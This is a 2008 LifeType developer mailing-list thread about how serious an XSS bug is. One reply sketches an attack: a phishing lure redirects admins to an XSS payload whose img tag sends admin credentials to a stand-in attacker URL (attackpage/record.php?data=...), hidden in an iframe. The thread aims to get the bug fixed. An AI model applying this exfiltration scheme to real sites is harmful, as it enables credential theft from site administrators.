[pLog-svn] Lifetype 1.2.8 ...

Jon Daley plogworld at jon.limedaley.com
Mon May 5 10:50:08 EDT 2008 

 	I understand that XSS can do stuff, I'd just like to see a 
specific example for this particular bug.  From the example on security 
focus, it had an empty value="" in the submit tag, which I am assuming is 
a typo, otherwise I don't see how there is anything that can be done on 
the server side to fix it.
 	Can anyone make a bit of javascript that actually gets something 
interesting using this bug?  Then we can look into general purpose 
solutions for fixing it, rather than one input at a time.

On Mon, 5 May 2008, Matt Wood wrote:

> Here is a common exploitation scenario for you...
>
> An Attacker is targeting the lifetype.net site, he wants admin.
>
> He knows from emails and reading around that Oscar, Reto, Mark and Jon are
> likely to have admin on that page, so he makes a webpage on geocities or
> google or something.
>
> On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
> that immediately redirects you to lifetype.net/admin.php with some
> javascript payload utilitizing the XSS exploit.
>
> This javascript payload can utilize XSS to create an img tag, this img tag
> has a src of http://attackpage/record.php?data=admincredentials-base64ed(orsomething)
> as long as the data fits in the get parameters. You could also
> create a form and have no limit.
>
> Now all the attacker has to do is email each of you telling you that he has
> found a serious bug in lifetype, and he has screenshots on this page
> http://google/blah.(html|php|jpg) (depending on his level of control of the
> site). Maybe he even puts screen shots on there so it doesn't look too
> scary... and uses an iframe to do the actual attack. You would never know
> unless you are monitoring all your traffic through a proxy.
>
> XSS is ALWAYS serious.
>
> On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:
>
>>>       Can you post an example?  I am still not getting how
>>> the server-side is involved. I understand that if I put
>>> javascript on the admin's site, the javascript would have
>>> access to stuff, but the browser is supposed to block
>>> javascript from grabbing stuff from one site and posting it
>>> to another, right?  So, somehow he grabs stuff via
>>> javascript, posts it to admin.php which then posts stuff to
>>> another site?
>>
>> I have  no idea either. Reto, if you can provide an example here, that
>> willl
>> very helpful.
>>
>>>       Sure, that's fine, but as far as I can tell, all inputs
>>> would be susceptible to the same problem, so fixing one
>>> variable isn't really a fix.
>>
>> Not "all" inputs, just those inputs that we use string validator and does
>> not filtered by htmlfilter( strip tags) or displayed without escape html
>> special characters ...
>>
>> I think quite few ..
>>
>> Mark
>>
>> _______________________________________________
>> pLog-svn mailing list
>> pLog-svn at devel.lifetype.net
>> http://limedaley.com/mailman/listinfo/plog-svn
>>
>

-- 
Jon Daley
http://jon.limedaley.com/

Truth is beautiful, without doubt; but so are lies.
-- Ralph Waldo Emerson

More information about the pLog-svn mailing list